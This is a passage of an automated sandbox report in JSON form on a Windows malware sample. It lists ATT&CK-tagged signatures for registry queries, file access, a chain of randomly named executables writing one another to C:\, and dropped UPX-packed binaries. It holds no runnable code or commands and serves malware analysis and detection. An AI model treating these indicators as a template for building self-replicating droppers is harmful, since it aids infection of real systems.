\"c:\\22420.exe\"\n \"22420.exe\" reads file \"c:\\202828.exe\"\n \"202828.exe\" reads file \"c:\\202828.exe\"\n \"202828.exe\" reads file \"c:\\pndnt.exe\"\n \"pndnt.exe\" reads file \"c:\\pndnt.exe\"\n \"pndnt.exe\" reads file \"c:\\rbbttj.exe\"\n \"rbbttj.exe\" reads file \"c:\\rbbttj.exe\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "registry-177", "type": 3, "relevance": 1, "name": "Opens registry keys", "description": "\"0f6b9ed18c9cf98256a3fc71eceb2cf8d900e1382638c4559488854aa3cae7ea.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\CONTROL PANEL\\DESKTOP\\MUICACHED\\MACHINELANGUAGECONFIGURATION\"; Key: \"\"; Value: \"\")\n \"0f6b9ed18c9cf98256a3fc71eceb2cf8d900e1382638c4559488854aa3cae7ea.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\MUI\\SETTINGS\"; Key: \"\"; Value: \"\")\n \"0f6b9ed18c9cf98256a3fc71eceb2cf8d900e1382638c4559488854aa3cae7ea.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\SOFTWARE\\POLICIES\\MICROSOFT\\CONTROL PANEL\\DESKTOP\"; Key: \"\"; Value: \"\")\n \"0f6b9ed18c9cf98256a3fc71eceb2cf8d900e1382638c4559488854aa3cae7ea.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\CONTROL PANEL\\DESKTOP\\LANGUAGECONFIGURATION\"; Key: \"\"; Value: \"\")\n \"0f6b9ed18c9cf98256a3fc71eceb2cf8d900e1382638c4559488854aa3cae7ea.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\CONTROL PANEL\\DESKTOP\"; Key: \"\"; Value: \"\")\n \"0f6b9ed18c9cf98256a3fc71eceb2cf8d900e1382638c4559488854aa3cae7ea.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\CONTROL PANEL\\DESKTOP\\MUICACHED\"; Key: \"\"; Value: \"\")\n \"0f6b9ed18c9cf98256a3fc71eceb2cf8d900e1382638c4559488854aa3cae7ea.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\SIDEBYSIDE\"; Key: \"\"; Value: \"\")\n \"0f6b9ed18c9cf98256a3fc71eceb2cf8d900e1382638c4559488854aa3cae7ea.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TERMINAL SERVER\"; Key: \"\"; Value: \"\")\n \"0f6b9ed18c9cf98256a3fc71eceb2cf8d900e1382638c4559488854aa3cae7ea.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\DIAGNOSTICS\"; Key: \"\"; Value: \"\")\n \"0f6b9ed18c9cf98256a3fc71eceb2cf8d900e1382638c4559488854aa3cae7ea.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\OLE\"; Key: \"\"; Value: \"\")\n \"0f6b9ed18c9cf98256a3fc71eceb2cf8d900e1382638c4559488854aa3cae7ea.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\OLE\\TRACING\"; Key: \"\"; Value: \"\")\n \"0f6b9ed18c9cf98256a3fc71eceb2cf8d900e1382638c4559488854aa3cae7ea.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\OLEAUT\"; Key: \"\"; Value: \"\")\n \"0f6b9ed18c9cf98256a3fc71eceb2cf8d900e1382638c4559488854aa3cae7ea.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SESSION MANAGER\"; Key: \"\"; Value: \"\")\n \"0f6b9ed18c9cf98256a3fc71eceb2cf8d900e1382638c4559488854aa3cae7ea.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SAFEBOOT\\OPTION\"; Key: \"\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-55", "type": 6, "relevance": 7, "name": "Touches files in the Windows directory", "description": "\"0f6b9ed18c9cf98256a3fc71eceb2cf8d900e1382638c4559488854aa3cae7ea.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"2662206.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"2668286.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"22420.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"202828.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"pndnt.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"rbbttj.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"tdthpd.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"rhhbnrn.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"txphbj.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"0862264.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"6042668.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"6408002.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"8266402.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"trtdln.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"jdtpf.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"tbhlt.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"trxpd.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"82880.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"44882.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"828882.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"2204222.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"028488.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"62820.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"80840.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "registry-172", "type": 3, "relevance": 1, "name": "Queries registry keys", "description": "\"0f6b9ed18c9cf98256a3fc71eceb2cf8d900e1382638c4559488854aa3cae7ea.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\CONTROL PANEL\\DESKTOP\"; Key: \"PREFERREDUILANGUAGES\"; Value: \"\")\n \"0f6b9ed18c9cf98256a3fc71eceb2cf8d900e1382638c4559488854aa3cae7ea.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\CONTROL PANEL\\DESKTOP\\MUICACHED\"; Key: \"MACHINEPREFERREDUILANGUAGES\"; Value: \"\")\n \"0f6b9ed18c9cf98256a3fc71eceb2cf8d900e1382638c4559488854aa3cae7ea.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\SIDEBYSIDE\"; Key: \"PREFEREXTERNALMANIFEST\"; Value: \"\")\n \"0f6b9ed18c9cf98256a3fc71eceb2cf8d900e1382638c4559488854aa3cae7ea.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TERMINAL SERVER\"; Key: \"TSAPPCOMPAT\"; Value: \"\")\n \"0f6b9ed18c9cf98256a3fc71eceb2cf8d900e1382638c4559488854aa3cae7ea.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TERMINAL SERVER\"; Key: \"TSUSERENABLED\"; Value: \"\")\n \"0f6b9ed18c9cf98256a3fc71eceb2cf8d900e1382638c4559488854aa3cae7ea.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\OLE\"; Key: \"PAGEALLOCATORUSESYSTEMHEAP\"; Value: \"\")\n \"0f6b9ed18c9cf98256a3fc71eceb2cf8d900e1382638c4559488854aa3cae7ea.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\OLE\"; Key: \"PAGEALLOCATORSYSTEMHEAPISPRIVATE\"; Value: \"\")\n \"0f6b9ed18c9cf98256a3fc71eceb2cf8d900e1382638c4559488854aa3cae7ea.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SESSION MANAGER\"; Key: \"CWDILLEGALINDLLSEARCH\"; Value: \"\")\n \"0f6b9ed18c9cf98256a3fc71eceb2cf8d900e1382638c4559488854aa3cae7ea.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"TRANSPARENTENABLED\"; Value: \"\")\n \"0f6b9ed18c9cf98256a3fc71eceb2cf8d900e1382638c4559488854aa3cae7ea.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"COMPATDLL\"; Value: \"\")\n \"0f6b9ed18c9cf98256a3fc71eceb2cf8d900e1382638c4559488854aa3cae7ea.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"00060101.00060101\"; Value: \"\")\n \"0f6b9ed18c9cf98256a3fc71eceb2cf8d900e1382638c4559488854aa3cae7ea.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"\"; Value: \"\")\n \"0f6b9ed18c9cf98256a3fc71eceb2cf8d900e1382638c4559488854aa3cae7ea.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SESSION MANAGER\"; Key: \"SAFEDLLSEARCHMODE\"; Value: \"\")\n \"0f6b9ed18c9cf98256a3fc71eceb2cf8d900e1382638c4559488854aa3cae7ea.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\GRE_INITIALIZE\"; Key: \"DISABLEMETAFILES\"; Value: \"\")\n \"0f6b9ed18c9cf98256a3fc71eceb2cf8d900e1382638c4559488854aa3cae7ea.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\COMPATIBILITY32\"; Key: \"0F6B9ED18C9CF98256A3FC71ECEB2CF8D900E1382638C4559488854AA3CAE7EA\"; Value: \"\")\n \"0f6b9ed18c9cf98256a3fc71eceb2cf8d900e1382638c4559488854aa3cae7ea.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINDOWS\"; Key: \"LOADAPPINIT_DLLS\"; Value: \"\")\n \"0f6b9ed18c9cf98256a3fc71eceb2cf8d900e1382638c4559488854aa3cae7ea.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"AUTHENTICODEENABLED\"; Value: \"\")\n \"0f6b9ed18c9cf98256a3fc71eceb2cf8d900e1382638c4559488854aa3cae7ea.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\APPCOMPAT\"; Key: \"DISABLEENGINE\"; Value: \"\")\n \"0f6b9ed18c9cf98256a3fc71eceb2cf8d900e1382638c4559488854aa3cae7ea.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\SHELL FOLDERS\"; Key: \"CACHE\"; Value: \"\")\n \"0f6b9ed18c9cf98256a3fc71eceb2cf8d900e1382638c4559488854aa3cae7ea.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\IMAGE FILE EXECUTION OPTIONS\"; Key: \"DISABLELOCALOVERRIDE\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-263", "type": 6, "relevance": 1, "name": "Touches files", "description": "\"0f6b9ed18c9cf98256a3fc71eceb2cf8d900e1382638c4559488854aa3cae7ea.exe\" trying to touch file \"C:\\Windows\\system32\\IMM32.DLL\"\n \"0f6b9ed18c9cf98256a3fc71eceb2cf8d900e1382638c4559488854aa3cae7ea.exe\" trying to touch file \"C:\\°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡\"\n \"0f6b9ed18c9cf98256a3fc71eceb2cf8d900e1382638c4559488854aa3cae7ea.exe\" trying to touch file \"c:\\2662206.exe\"\n \"0f6b9ed18c9cf98256a3fc71eceb2cf8d900e1382638c4559488854aa3cae7ea.exe\" trying to touch file \"C:\\Windows\\Temp\\VxOle32.dll\"\n \"0f6b9ed18c9cf98256a3fc71eceb2cf8d900e1382638c4559488854aa3cae7ea.exe\" trying to touch file \"C:\\Windows\\SYSTEM32\\sechost.dll\"\n \"0f6b9ed18c9cf98256a3fc71eceb2cf8d900e1382638c4559488854aa3cae7ea.exe\" trying to touch file \"C:\\FLTLIB.DLL\"\n \"0f6b9ed18c9cf98256a3fc71eceb2cf8d900e1382638c4559488854aa3cae7ea.exe\" trying to touch file \"C:\\Windows\\system32\\FLTLIB.DLL\"\n \"0f6b9ed18c9cf98256a3fc71eceb2cf8d900e1382638c4559488854aa3cae7ea.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-synch-l1-2-0.DLL\"\n \"0f6b9ed18c9cf98256a3fc71eceb2cf8d900e1382638c4559488854aa3cae7ea.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-fibers-l1-1-1.DLL\"\n \"0f6b9ed18c9cf98256a3fc71eceb2cf8d900e1382638c4559488854aa3cae7ea.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-localization-l1-2-1.DLL\"\n \"0f6b9ed18c9cf98256a3fc71eceb2cf8d900e1382638c4559488854aa3cae7ea.exe\" trying to touch file \"\\FileSystem\\Filters\\FltMgrMsg\"\n \"0f6b9ed18c9cf98256a3fc71eceb2cf8d900e1382638c4559488854aa3cae7ea.exe\" trying to touch file \"C:\\Windows\\Temp\\VxSSL32.dll\"\n \"0f6b9ed18c9cf98256a3fc71eceb2cf8d900e1382638c4559488854aa3cae7ea.exe\" trying to touch file \"C:\\Windows\\system32\\apphelp.dll\"\n \"0f6b9ed18c9cf98256a3fc71eceb2cf8d900e1382638c4559488854aa3cae7ea.exe\" trying to touch file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"0f6b9ed18c9cf98256a3fc71eceb2cf8d900e1382638c4559488854aa3cae7ea.exe\" trying to touch file \"c:\\ui\\SwDRM.dll\"\n \"0f6b9ed18c9cf98256a3fc71eceb2cf8d900e1382638c4559488854aa3cae7ea.exe\" trying to touch file \"C:\\Windows\\System32\\imm32.dll\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-161", "type": 6, "relevance": 3, "name": "Tries to access non-existent files (non-executable)", "description": "\"0f6b9ed18c9cf98256a3fc71eceb2cf8d900e1382638c4559488854aa3cae7ea.exe\" trying to access non-existent file \"C:\\°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡\"\n \"2662206.exe\" trying to access non-existent file \"C:\\°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡\"\n \"2668286.exe\" trying to access non-existent file \"C:\\°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡\"\n \"22420.exe\" trying to access non-existent file \"C:\\°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡\"\n \"202828.exe\" trying to access non-existent file \"C:\\°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡\"\n \"pndnt.exe\" trying to access non-existent file \"C:\\°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡\"\n \"rbbttj.exe\" trying to access non-existent file \"C:\\°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡\"\n \"tdthpd.exe\" trying to access non-existent file \"C:\\°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡\"\n \"rhhbnrn.exe\" trying to access non-existent file \"C:\\°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡\"\n \"txphbj.exe\" trying to access non-existent file \"C:\\°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡\"\n \"0862264.exe\" trying to access non-existent file \"C:\\°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡\"\n \"6042668.exe\" trying to access non-existent file \"C:\\°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡\"\n \"6408002.exe\" trying to access non-existent file \"C:\\°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-242", "type": 6, "relevance": 1, "name": "Writes files", "description": "\"0f6b9ed18c9cf98256a3fc71eceb2cf8d900e1382638c4559488854aa3cae7ea.exe\" writes file \"c:\\2662206.exe\"\n \"2662206.exe\" writes file \"c:\\2668286.exe\"\n \"2668286.exe\" writes file \"c:\\22420.exe\"\n \"22420.exe\" writes file \"c:\\202828.exe\"\n \"202828.exe\" writes file \"c:\\pndnt.exe\"\n \"pndnt.exe\" writes file \"c:\\rbbttj.exe\"\n \"rbbttj.exe\" writes file \"c:\\tdthpd.exe\"\n \"tdthpd.exe\" writes file \"c:\\rhhbnrn.exe\"\n \"rhhbnrn.exe\" writes file \"c:\\txphbj.exe\"\n \"txphbj.exe\" writes file \"c:\\0862264.exe\"\n \"0862264.exe\" writes file \"c:\\6042668.exe\"\n \"6042668.exe\" writes file \"c:\\6408002.exe\"\n \"6408002.exe\" writes file \"c:\\8266402.exe\"\n \"8266402.exe\" writes file \"c:\\trtdln.exe\"\n \"trtdln.exe\" writes file \"c:\\jdtpf.exe\"\n \"jdtpf.exe\" writes file \"c:\\tbhlt.exe\"\n \"tbhlt.exe\" writes file \"c:\\trxpd.exe\"\n \"trxpd.exe\" writes file \"c:\\82880.exe\"\n \"82880.exe\" writes file \"c:\\44882.exe\"\n \"44882.exe\" writes file \"c:\\828882.exe\"\n \"828882.exe\" writes file \"c:\\2204222.exe\"\n \"2204222.exe\" writes file \"c:\\028488.exe\"\n \"028488.exe\" writes file \"c:\\62820.exe\"\n \"62820.exe\" writes file \"c:\\80840.exe\"\n \"80840.exe\" writes file \"c:\\22884.exe\"", "origin": "API Call"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "binary-0", "type": 8, "relevance": 3, "name": "Dropped files", "description": "\"xvpdt.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"hbpvtv.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"hfxhd.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"vjdjljv.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"rffrrb.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"nvdfbr.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"02886.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"2086280.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"84862.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"xppdbt.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"0082442.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"hvtvd.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"djlrn.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"86488.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"246648.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"xjnvbp.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"tjnrdtx.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"2860666.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"46228.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\46228.exe]- [targetUID: 00000000-00004524]\n \"226688.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\226688.exe]- [targetUID: 00000000-00001524]\n \"88406.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\88406.exe]- [targetUID: 00000000-00001524]\n \"0248006.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\0248006.exe]- [targetUID: 00000000-00003536]\n \"08802.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\08802.exe]- [targetUID: 00000000-00003536]\n \"24440.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\24440.exe]- [targetUID: 00000000-00003628]\n \"6460462.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\6460462.exe]- [targetUID: 00000000-00004152]\n \"242662.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\242662.exe]- [targetUID: 00000000-00004152]\n \"0284862.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\0284862.exe]- [targetUID: 00000000-00001692]\n \"084808.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\084808.exe]- [targetUID: 00000000-00000896]\n \"64644.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\64644.exe]- [targetUID: 00000000-00000896]\n \"860486.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\860486.exe]- [targetUID: 00000000-00001472]\n \"086684.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\086684.exe]- [targetUID: 00000000-00000552]\n \"260604.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\260604.exe]- [targetUID: 00000000-00001376]\n \"ndnvbhn.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\ndnvbhn.exe]- [targetUID: 00000000-00000456]\n \"tlflpxl.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\tlflpxl.exe]- [targetUID: 00000000-00000456]\n \"vjtpp.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\vjtpp.exe]- [targetUID: 00000000-00000848]\n \"rddvv.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\rddvv.exe]- [targetUID: 00000000-00003164]\n \"tthvrx.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\tthvrx.exe]- [targetUID: 00000000-00003816]\n \"xpxpjbf.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\xpxpjbf.exe]- [targetUID: 00000000-00001424]\n \"jxtxllv.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\jxtxllv.exe]- [targetUID: 00000000-00001424]\n \"fnhrv.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\fnhrv.exe]- [targetUID: 00000000-00000656]\n \"dbbpb.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\dbbpb.exe]- [targetUID: 00000000-00000656]\n \"fttbvhn.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\fttbvhn.exe]- [targetUID: 00000000-00003204]\n \"8868006.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\8868006.exe]- [targetUID: 00000000-00003512]\n \"86602.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\86602.exe]- [targetUID: 00000000-00003512]\n \"6266488.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to 